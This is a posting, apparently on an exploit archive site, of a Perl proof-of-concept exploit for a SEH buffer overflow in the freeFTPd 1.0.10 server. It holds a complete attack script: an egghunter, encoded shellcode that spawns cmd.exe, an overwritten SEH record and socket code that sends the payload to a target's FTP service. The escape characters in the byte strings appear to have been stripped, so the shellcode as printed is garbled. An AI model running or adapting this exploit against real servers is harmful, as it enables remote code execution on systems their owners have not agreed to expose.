Home / exploits freeFTPd 1.0.10 Buffer Overflow
Posted on 22 August 2013
#!/usr/bin/perl # freeFTPd 1.0.10 anonymous-auth PASS SEH buffer overflow # PoC by Wireghoul - www.justanotherhacker.com # Date: 20130820 # Tested on: XPSP3 # Similar exploits: # EDB 23079 1330 1339 # Greetz corelan, TecR0C, mr_me, jjkakakk if (scalar(@ARGV) != 2) { "Usage $0 host port "; exit; } use IO::Socket::INET; # Null byte in ppr forces a backwards short jump allowing 128 bytes shellcode max # Thus we use an egghunter my $egghunter = "x66x81xCAxFFx0Fx42x52x6Ax43x58xCDx2Ex3Cx05x5Ax74xEFxB8". "WRGL". "x8BxFAxAFx75xEAxAFx75xE7xFFxE7"; # I expect the max lenght for this is ~1024 bytes, didn't bother checking # Spawn cmd.exe from msfpayload windows/exec CMD=cmd.exe R | msfencode -b 'x0ax0d' -t perl my $shell = "xd9xebxd9x74x24xf4x5exbfxe0xddxfbx11x33xc9" . "xb1x32x31x7ex1ax83xc6x04x03x7ex16xe2x15x21" . "x13x98xd5xdaxe4xfbx5cx3fxd5x29x3ax4bx44xfe" . "x49x19x65x75x1fx8axfexfbxb7xbdxb7xb6xe1xf0" . "x48x77x2dx5ex8ax19xd1x9dxdfxf9xe8x6dx12xfb" . "x2dx93xddxa9xe6xdfx4cx5ex83xa2x4cx5fx43xa9" . "xedx27xe6x6ex99x9dxe9xbex32xa9xa1x26x38xf5" . "x11x56xedxe5x6dx11x9axdex06xa0x4ax2fxe7x92" . "xb2xfcxd6x1ax3fxfcx1fx9cxa0x8bx6bxdex5dx8c" . "xa8x9cxb9x19x2cx06x49xb9x94xb6x9ex5cx5fxb4" . "x6bx2ax07xd9x6axffx3cxe5xe7xfex92x6fxb3x24" . "x36x2bx67x44x6fx91xc6x79x6fx7dxb6xdfxe4x6c" . "xa3x66xa7xfax32xeaxd2x42x34xf4xdcxe4x5dxc5" . "x57x6bx19xdaxb2xcfxd5x90x9ex66x7ex7dx4bx3b" . "xe3x7exa6x78x1axfdx42x01xd9x1dx27x04xa5x99" . "xd4x74xb6x4fxdax2bxb7x45xb9xa6x23x48x58x41" . "xc9x94"; my $egg = "USER WRGLWRGL$shell "; my $usr = "USER anonymous "; # Must be an existing anonymous account # I'm lazy, NOPs are fine by me my $pre = "PASS " . "x90" x (797 - length($egghunter)) . $egghunter; my $seh1 = "x90x90xEBx80"; # nop, nop, jmp+4 my $seh2 = "xf0x42x41x00"; # PPR from freeFTPDService.exe (only unsafe SEH module), 0x004142f0 my $pad = "X" x 209 ." "; my $payload = $pre . $seh1 . $seh2 . $pad; my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to connect! "; my $eggsock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to connect! "; print $eggsock $egg; sleep 1; print $sock $usr; sleep 1; print "Preparing exploit "; sleep 1; print $sock $payload; print "Exploiting "; sleep 3; print "Done ";
